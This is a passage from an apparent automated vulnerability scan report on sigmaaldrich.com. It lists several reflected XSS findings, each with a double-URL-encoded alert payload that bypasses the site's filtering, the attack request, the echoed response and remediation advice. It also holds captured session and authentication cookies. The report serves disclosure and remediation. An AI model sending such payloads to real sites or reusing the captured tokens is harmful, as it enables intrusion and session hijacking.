WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib8e093";alert(1)//546f4c6ebec/logos/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.419. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be25%2522%253balert%25281%2529%252f%252f85c48fd9f87 was submitted in the REST URL parameter 3. This input was echoed as 3be25";alert(1)//85c48fd9f87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos3be25%2522%253balert%25281%2529%252f%252f85c48fd9f87/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos3be25";alert(1)//85c48fd9f87/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.420. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a45%2522%253balert%25281%2529%252f%252fa7745df03c1 was submitted in the REST URL parameter 4. This input was echoed as f8a45";alert(1)//a7745df03c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/small-signup-iconf8a45%2522%253balert%25281%2529%252f%252fa7745df03c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/small-signup-iconf8a45";alert(1)//a7745df03c1","E404") ;
   </script>
...[SNIP]...

1.421. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4d97%2522%253balert%25281%2529%252f%252f5ac7019904a was submitted in the REST URL parameter 1. This input was echoed as b4d97";alert(1)//5ac7019904a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb4d97%2522%253balert%25281%2529%252f%252f5ac7019904a/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:06 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb4d97";alert(1)//5ac7019904a/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.422. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90855%2522%253balert%25281%2529%252f%252f20f8e447cc7 was submitted in the REST URL parameter 2. This input was echoed as 90855";alert(1)//20f8e447cc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib90855%2522%253balert%25281%2529%252f%252f20f8e447cc7/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib90855";alert(1)//20f8e447cc7/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.423. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c49%2522%253balert%25281%2529%252f%252ff91d1bd5537 was submitted in the REST URL parameter 3. This input was echoed as d4c49";alert(1)//f91d1bd5537 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd4c49%2522%253balert%25281%2529%252f%252ff91d1bd5537/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:11 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd4c49";alert(1)//f91d1bd5537/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.424. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac03a%2522%253balert%25281%2529%252f%252f25e2bed661d was submitted in the REST URL parameter 4. This input was echoed as ac03a";alert(1)//25e2bed661d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headersac03a%2522%253balert%25281%2529%252f%252f25e2bed661d/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:15 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headersac03a";alert(1)//25e2bed661d/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.425. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df246%2522%253balert%25281%2529%252f%252f46ecedfb122 was submitted in the REST URL parameter 5. This input was echoed as df246";alert(1)//46ecedfb122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-anddf246%2522%253balert%25281%2529%252f%252f46ecedfb122/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:17 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-anddf246";alert(1)//46ecedfb122/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.426. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 6]

Summary

Severity:   High
